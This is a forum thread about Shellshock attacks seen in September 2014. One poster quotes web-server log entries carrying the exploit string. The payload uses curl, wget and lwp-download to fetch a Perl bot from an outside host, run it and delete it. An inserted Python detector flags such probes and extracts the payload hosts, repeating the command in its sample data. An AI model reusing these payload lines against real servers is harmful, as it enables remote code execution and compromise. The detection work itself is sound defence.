
I've also seen some in the wild, and I'm behind CloudFlare. CloudFlare have stopped the attacks reaching us now, but a few got through on the 29th September (this is a Pro account). I'm not sure precisely when the CloudFlare protection started, but all servers involved were patched as soon as the patches were available (before the first attacks reached my servers).

The log file entries:

    200.91.29.35 - - [29/Sep/2014:17:18:44 +0000] "GET /conversations/626/&sa=U&ei=IoYpVKPNNMPmsASpzoLwAg&ved=0CJoBEBYwFzi8BQ&usg=AFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET /conversations/626/%26amp%3Bsa%3DU%26amp%3Bei%3DIoYpVKPNNMPmsASpzoLwAg%26amp%3Bved%3D0CJoBEBYwFzi8BQ%26amp%3Busg%3DAFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl/ HTTP/1.1" 404 10779 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET //cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /cgi-bin/env.pl/ HTTP/1.1" 404 10637 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /conversations/626//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:47 +0000] "GET /conversations/626//cgi-bin/env.pl/ HTTP/1.1" 404 10656 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
The pastebin of the Perl script at the other end: http://pastebin.ca/2850408
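As an added example (not part of the post above), here is a small detector that parses access-log lines in the Apache "combined" format and flags the Shellshock probe signature `() {` in the Referer and User-Agent fields, pulling out the hostnames the payload tries to fetch from. It goes slightly beyond the post by also checking the URL-decoded request line, since the same marker can be smuggled through the path. The sample lines are constructed to mirror the entries quoted above (one probe trimmed to a single download command, plus one benign request); `SAMPLE_LOG`, `scan` and the helper names are this example's own, not anything from the thread.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: one probe modelled on the post's log entries (Apache
# escapes literal double quotes inside a field as \x22) and one benign hit.
SAMPLE_LOG = r'''200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET //cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
10.0.0.7 - - [29/Sep/2014:17:20:01 +0000] "GET /conversations/626/ HTTP/1.1" 200 4812 "https://example.invalid/" "Mozilla/5.0 (constructed benign UA)"
'''

# Apache/nginx "combined" format: ip ident user [time] "request" status size
# "referer" "user-agent". Quoted fields may contain backslash escapes.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger is a bash function definition at the start of an
# environment variable value; "() {" (whitespace optional) is its fingerprint.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# URLs embedded in the payload, terminated by whitespace or shell punctuation.
URL_RE = re.compile(r"https?://[^\s'\";)]+")


def parse_line(line):
    """Return the combined-format fields as a dict, or None if unparseable."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_probe(entry):
    """True if any attacker-controlled header field carries the signature."""
    fields = (entry["referer"], entry["ua"], unquote(entry["request"]))
    return any(SHELLSHOCK_RE.search(f) for f in fields)


def payload_hosts(entry):
    """Hostnames the payload tries to download from (useful as IoCs)."""
    hosts = set()
    for field in (entry["referer"], entry["ua"]):
        for url in URL_RE.findall(field):
            host = urlsplit(url).hostname
            if host:
                hosts.add(host)
    return sorted(hosts)


def scan(log_text):
    """Walk a log, returning one finding per line that matches the probe."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None or not is_shellshock_probe(entry):
            continue
        findings.append({
            "ip": entry["ip"],
            "time": entry["ts"],
            "request": entry["request"],
            "status": int(entry["status"]),
            "hosts": payload_hosts(entry),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['request']!r} -> {f['status']} "
              f"payload hosts: {', '.join(f['hosts'])}")
```

A 301 or 404 in the status column, as in the post's entries, does not by itself mean the probe failed: the vulnerability fires when a CGI handler exports the header into bash's environment, before the response code is decided, so the response status is not a reliable indicator of compromise and the host should be checked for the downloaded file and for outbound connections to the listed hosts.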


It's interesting to note that some code has been written by Portuguese/Brazilian devs and other parts by an Italian one, which leads to speculation that it was not a one-man band but instead a group.


I figured it was just the work of script kiddies. The exploit is such an easy thing to do that people are just cobbling together scripts and having a go.



